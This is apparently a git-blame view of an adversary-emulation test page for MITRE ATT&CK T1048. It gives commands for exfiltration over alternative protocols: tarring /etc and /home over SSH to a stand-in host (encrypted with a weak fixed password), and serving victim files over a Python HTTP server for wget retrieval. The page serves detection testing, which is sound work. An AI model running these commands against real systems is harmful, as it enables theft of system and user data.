2018-02-08 06:52:43 -06:00
|
|
|
## Exfiltration Over Alternative Protocol
|
2018-02-08 17:01:34 +11:00
|
|
|
|
|
|
|
|
MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)
|
|
|
|
|
|
|
|
|
|
### SSH
|
|
|
|
|
|
|
|
|
|
Remote to Local:
|
|
|
|
|
|
|
|
|
|
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
|
|
|
|
|
|
|
|
|
|
Local to Remote:
|
|
|
|
|
|
2018-02-08 17:05:23 +11:00
|
|
|
tar czpf - /home/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /home.tar.gz.enc'
|
2018-02-08 17:01:34 +11:00
|
|
|
|
2018-03-15 17:03:14 -05:00
|
|
|
### HTTP
|
|
|
|
|
|
|
|
|
|
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
|
|
|
|
|
|
|
|
|
|
Victim System Configuration:
|
|
|
|
|
|
|
|
|
|
mkdir /tmp/victim-staging-area
|
|
|
|
|
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
|
|
|
|
|
|
|
|
|
|
Using Python to establish a one-line HTTP server on victim system:
|
|
|
|
|
|
|
|
|
|
cd /tmp/victim-staging-area
|
|
|
|
|
python -m SimpleHTTPServer 1337
|
|
|
|
|
|
|
|
|
|
To retrieve the data from an adversary system:
|
|
|
|
|
|
|
|
|
|
wget http://VICTIM_IP:1337/victim-file.txt
|